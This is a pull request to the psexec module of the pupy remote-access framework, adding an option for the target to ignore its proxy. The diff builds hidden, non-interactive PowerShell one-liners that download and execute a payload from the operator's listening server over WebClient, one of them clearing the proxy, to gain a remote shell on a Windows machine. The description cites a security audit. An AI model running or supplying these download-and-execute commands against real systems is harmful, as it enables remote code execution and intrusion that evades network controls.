### PR TITLE
adding the option to not use proxy for the ps1_oneliner during psexec

### DIFF
--- a/pupy/modules/psexec.py
+++ b/pupy/modules/psexec.py
@@ -41,6 +41,7 @@ class PSExec(PupyModule):
         sgroupp = self.arg_parser.add_argument_group("Command Execution", "Get a remote shell")
         sgroupp.add_argument('--ps1-oneliner', action='store_true', default=False, help="Download and execute pupy using ps1_oneline")
         sgroupp.add_argument('--ps1-port', default=8080, type=int, help="Custom port used by the listening server (used with --ps1-oneliner, default: 8080)")
+        sgroupp.add_argument('--no-use-proxy', action='store_true', default=None, help="Don't use the target's proxy configuration even if it is used by target")
         sgroupp.add_argument("--ps1",  action='store_true', default=False, help="Upload and execute a powershell file to get a pupy session")
         sgroupp.add_argument("--file", dest="file", default=None, help="Upload and execute an exe file")
         
@@ -115,7 +116,14 @@ class PSExec(PupyModule):
             res=self.client.conn.modules['pupy'].get_connect_back_host()
             ip, port = res.rsplit(':', 1)
 
-            cmd = '%s/pupygen.py -f ps1_oneliner --ps1-oneliner-listen-port %s connect --host %s:%s' % (os.getcwd(), str(args.ps1_port), ip, port)
+            no_use_proxy = ''
+            if args.no_use_proxy:
+                no_use_proxy = '--no-use-proxy'
+                args.command = 'powershell.exe -w hidden -noni -nop -c "$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();iex($w.DownloadString(\'http://%s:%s/eiloShaegae1\'));"' % (ip, str(args.ps1_port))
+            else:
+                args.command = 'powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString(\'http://%s:%s/eiloShaegae1\')"' % (ip, str(args.ps1_port))
+
+            cmd = '%s/pupygen.py -f ps1_oneliner %s --ps1-oneliner-listen-port %s connect --host %s:%s' % (os.getcwd(), no_use_proxy, str(args.ps1_port), ip, port)
             self.warning('starting the local server')
             process = Popen(cmd.split(' '), stdout=PIPE, stderr=PIPE, stdin=PIPE)
             time.sleep(2)
@@ -126,7 +134,6 @@ class PSExec(PupyModule):
                 return
             
             self.success('server started (pid: %s)' % process.pid)
-            args.command = 'powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString(\'http://%s:%s/eiloShaegae1\')"' % (ip, str(args.ps1_port))
 
         self.info("Loading dependencies")
         self.client.load_package("impacket")


### PR DESCRIPTION
Without this option, I couldn't get a shell during my last audit 